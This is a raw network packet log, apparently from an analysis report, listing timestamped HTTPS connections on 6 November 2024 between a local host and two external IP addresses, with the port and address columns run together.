                                                                                                                                              Nov 6, 2024 16:56:01.264982939 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265139103 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265151978 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265290976 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.265306950 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265324116 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.265332937 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265419006 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.265429020 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.265927076 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266100883 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.266108036 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266439915 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266441107 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266501904 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266516924 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.266535997 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.266602039 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.266654015 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.266912937 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.266997099 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.267364979 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.267432928 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.267498970 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.267508984 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.267538071 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.267553091 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.267963886 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.267986059 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268034935 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268073082 CET44349843188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.268124104 CET49843443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268306017 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268342018 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.268429041 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268518925 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.268577099 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268601894 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.268661022 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269162893 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269162893 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269176006 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269196033 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269216061 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269359112 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269381046 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269627094 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269731998 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269807100 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269819021 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.269861937 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.269879103 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.311343908 CET44349842188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.314132929 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.314136982 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.314142942 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.314169884 CET49842443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.608668089 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608748913 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608788967 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608820915 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608822107 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.608833075 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608867884 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.608881950 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608915091 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.608931065 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.608937025 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.609003067 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.613434076 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.656733036 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.656753063 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.712028980 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.724699020 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.724793911 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.724828005 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.724837065 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.724850893 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.724917889 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.724922895 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.725287914 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.725322962 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.725327969 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.725332975 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.725368023 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.725373030 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726310968 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726356030 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726387978 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.726393938 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726428032 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726440907 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.726445913 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726499081 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726501942 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.726507902 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.726545095 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.727201939 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.727271080 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.727302074 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.727330923 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.727336884 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.727389097 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.727392912 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.775017977 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.836560011 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836606979 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836638927 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836661100 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.836671114 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836704969 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836721897 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.836726904 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836770058 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.836771965 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836787939 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.836841106 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.836935043 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.841478109 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.841572046 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.841622114 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.841645956 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.841659069 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.841692924 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.842417002 CET49838443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.842432976 CET44349838188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.842961073 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.842988968 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.843049049 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.843946934 CET49845443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.843969107 CET44349845188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.855779886 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.856254101 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.856318951 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.856381893 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.856410027 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.856467962 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.857717991 CET49839443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.857750893 CET44349839188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.858077049 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.858125925 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.858206987 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.858864069 CET49846443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.858890057 CET44349846188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.861500025 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:01.861537933 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.861610889 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:01.862014055 CET49847443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:01.862031937 CET44349847188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.876277924 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.876553059 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.876576900 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.876985073 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.877334118 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.877443075 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.877480984 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.886015892 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.886028051 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.918066025 CET49844443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.918097019 CET44349844188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.934026003 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.958368063 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958448887 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958482027 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958493948 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.958512068 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958544016 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958549976 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.958555937 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958595991 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.958600998 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958627939 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.958664894 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.958669901 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.959337950 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.959369898 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.959379911 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.959387064 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.959422112 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.959427118 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960165024 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960196018 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960210085 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.960216045 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960251093 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.960256100 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960946083 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.960994005 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.960999966 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.961045027 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.961085081 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.961091042 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978724957 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978801966 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978835106 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978863001 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.978866100 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978897095 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978914022 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.978934050 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978970051 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.978981018 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.978986025 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:01.979022980 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:01.979027987 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.013004065 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.029026985 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.029067039 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.076036930 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.079754114 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.079830885 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.079869032 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.079899073 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.079917908 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.079940081 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.079957962 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.079984903 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080029964 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.080034971 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080199957 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080233097 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080250978 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.080256939 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080297947 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.080302000 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080849886 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080900908 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.080904961 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080914974 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.080979109 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.080982924 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.081512928 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.081566095 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.081608057 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.081612110 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.081671953 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.082415104 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.082482100 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.082484007 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.082493067 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.082520962 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.082528114 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.082570076 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.082573891 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.082741976 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.083374023 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.083419085 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.083441973 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.083446026 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.083473921 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.083482981 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.084139109 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.084196091 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.084233999 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.084233999 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.084240913 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.084285021 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.095029116 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095113993 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095149040 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095180035 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095204115 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095223904 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.095244884 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.095258951 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.095287085 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.095998049 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096357107 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096399069 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096430063 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096455097 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.096465111 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096487045 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.096507072 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.096546888 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.096551895 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.097424030 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.097456932 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.097486973 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.097495079 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.097553015 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.097558022 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.097601891 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.098303080 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.152992964 CET49840443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.153011084 CET44349840188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201551914 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201603889 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201633930 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.201659918 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201677084 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.201716900 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201728106 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.201733112 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201749086 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201756001 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.201776981 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201817989 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.201822996 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.201834917 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.202346087 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.202462912 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.202469110 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.202626944 CET49841443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:02.202635050 CET44349841188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:02.202678919 CET44349841188.114.97.3192.168.2.18
